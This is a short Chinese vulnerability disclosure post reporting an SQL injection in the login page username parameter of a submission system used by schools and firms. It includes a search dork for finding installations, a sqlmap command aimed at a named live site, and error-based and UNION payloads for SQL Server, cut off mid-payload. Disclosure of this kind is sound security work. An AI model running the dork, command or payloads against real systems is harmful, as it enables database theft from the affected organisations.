某投稿系统通用型SQL注射漏洞(影响众多企事业单位及学校)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 某投稿系统通用型SQL注射漏洞 ### 详细说明: 南京杰诺瀚软件科技有限公司的投稿系统SQL注射漏洞 ``` intitle:投稿系统 技术支持:南京杰诺瀚软件科技有限公司 ``` Web/Login.aspx 页面的 username 参数存在问题 DBA 权限注射 URL: ``` http://209.116.186.246/#newwindow=1&q=intitle:%E6%8A%95%E7%A8%BF%E7%B3%BB%E7%BB%9F+%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E5%8D%97%E4%BA%AC%E6%9D%B0%E8%AF%BA%E7%80%9A%E8%BD%AF%E4%BB%B6%E7%A7%91%E6%8A%80%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8 ``` 1:sqlmap.py -u "http://www.cnemergency.com/Web/Login.aspx" --data "usern ame=" --is-dba --dbs ``` --- Place: POST Parameter: username Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: username=' AND 3756=CONVERT(INT,(SELECT CHAR(113)+CHAR(108)+CHAR(10 6)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (3756=3756) THEN CHAR(49) ELSE CHAR(48 ) END))+CHAR(113)+CHAR(113)+CHAR(109)+CHAR(118)+CHAR(113))) AND 'OGZf'='OGZf Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: username=' UNION ALL SELECT...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息